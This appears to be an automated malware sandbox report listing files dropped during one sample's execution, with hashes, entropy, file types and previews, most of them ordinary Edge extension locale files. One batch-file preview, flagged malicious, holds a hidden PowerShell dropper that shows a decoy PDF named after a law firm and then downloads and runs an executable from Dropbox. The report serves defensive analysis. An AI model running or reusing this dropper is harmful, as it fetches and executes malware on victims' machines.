                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:DOS batch file, ASCII text, with very long lines (459), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):519
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.554735877741627
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:0G81kFX0b11JkdhdEBfH1MRdEFvtyJkP1i3sQBvg2Wgn:0GpObJQEF+YCJaf2WQ
                                                                                                                                                                                                                                                                                              MD5:D6FEF04E6A7EFD2593AD7FCE9D652DA1
                                                                                                                                                                                                                                                                                              SHA1:035200B8F59E5A3BBB577FE57CBFC08155324358
                                                                                                                                                                                                                                                                                              SHA-256:C66E540FB7A5EC364C3CDE98BA97FD02C057D4FAE5099C596E0B53EBD9918FF2
                                                                                                                                                                                                                                                                                              SHA-512:285696A4DCD6E4CCD4BA698AABC0A142D35E1B5EC68DADFE725BFBD815EF2043249DFFB1748A2BBD3B521CE3C66257E5AF0040B78B3D0FAC5CF6D55E3582B9B3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Preview:@echo off..powershell -WindowStyle Hidden -Command ^.. "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"..exit
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):206855
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.983991878155761
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEIx:l81Lel7E6lEMVo/S01fDpWmEgr
                                                                                                                                                                                                                                                                                              MD5:03E0A41C7EF64C946D818C2F5E4B7EC3
                                                                                                                                                                                                                                                                                              SHA1:B3FEB76961D6A54EB9566EAC7E688BC55394B672
                                                                                                                                                                                                                                                                                              SHA-256:CA2E03394F3B161D3A1E25F6A77B28EFDAB1D7989A0A1C2B6FC1764D8C27B7C7
                                                                                                                                                                                                                                                                                              SHA-512:3F775790206CADE3A9CFBDCC3C081611330D525222D43085749A98D975B779109DF305799C53386E4B251D1D892735F5B4B31E6CD95475D0606BDD13BDB24001
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):263704
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.998774950072608
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:6144:vj1QHfvuVtTT0bCnop1MIPG4y9XgcbKdhRuQRhzb6d0X7ayNC:vjq/GGCnorP0952dPuQRFW0X2yk
                                                                                                                                                                                                                                                                                              MD5:EF6DB67B82032D675EA4E61A73D3C358
                                                                                                                                                                                                                                                                                              SHA1:882A4CF2944FC8E27F435890DF647177AD167CB0
                                                                                                                                                                                                                                                                                              SHA-256:97C885F4390FFAE57EF240B46E113A0DFF637A003B6AD54031A1AA6809956276
                                                                                                                                                                                                                                                                                              SHA-512:B41B3CD76F50964CD4FA0AB18BEB785FA592CB92045B3455D238799A1167CB5190EB1C7E0216E1E874AA03A8686025A6B366926023C9C56834B92B4F612D0A18
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):76321
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.996057445951542
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
                                                                                                                                                                                                                                                                                              MD5:D7A1AC56ED4F4D17DD0524C88892C56D
                                                                                                                                                                                                                                                                                              SHA1:4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
                                                                                                                                                                                                                                                                                              SHA-256:0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
                                                                                                                                                                                                                                                                                              SHA-512:31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138356
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                              MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                              SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                              SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                              SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                              Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:L:L
MD5:5058F1AF8388633F609CADB75A75DC9D
SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:false
Preview:.
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:PNG image data, 204 x 264, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):437259
Entropy (8bit):7.998726360451669
Encrypted:true
SSDEEP:12288:r0Ti9JPNfgBTIxXL2v6YRl5JCqqpRFW0X2yk:us1IBTI9LkhSqqQ0Xq
MD5:D14135E953CC12D6CE5AB9529108AB12
SHA1:A3CA22055B2864F479A137CFDA856009AEB693A7
SHA-256:91D3663C9ED02759863A7B0D7BB909BC09C172FB698CA65F01C4624A8E09DF46
SHA-512:9155BC046699A5B69424D2E1CD9AD00447C02E5CEC1377C8DAE592CB2639C1495FE0217FD906666FAF2D2D29F7FC27A2CA52DEC72B9A04D06DEBFC29F9C1C059
Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2110
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.400636375390121
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854RrQ:8e2Fa116uCntc5toYhRM
                                                                                                                                                                                                                                                                                              MD5:E5601AE885669424B407E6B50AD26E99
                                                                                                                                                                                                                                                                                              SHA1:8528B22C5D382A7B056CC188D0FF51ABCB95F4D7
                                                                                                                                                                                                                                                                                              SHA-256:8B5F249078377E9B98082284E4224637028EDF8096AB4FA5D05A3C3447447A0F
                                                                                                                                                                                                                                                                                              SHA-512:E5EE37595993F61FC18C77F7F600672C62FBCF73DE7DEA68980C8526B7CE87F6692286FCACDD779A21ECF9B9E7896821BC5B0EE79364BC094A196DB755B69694
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138356
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                              MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                              SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                              SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                              SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4982
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                              MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                              SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                              SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                              SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):908
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                              MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                              SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                              SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                              SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1285
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                              MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                              SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                              SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                              SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1244
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                              MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                              SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                              SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                              SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                              MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                              SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                              SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                              SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3107
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                              MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                              SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                              SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                              SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1389
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                              MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                              SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                              SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                              SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1763
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                              MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                              SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                              SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                              SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):930
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                              MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                              SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                              SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                              SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):913
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                              MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                              SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                              SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                              SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                              Malicious:false
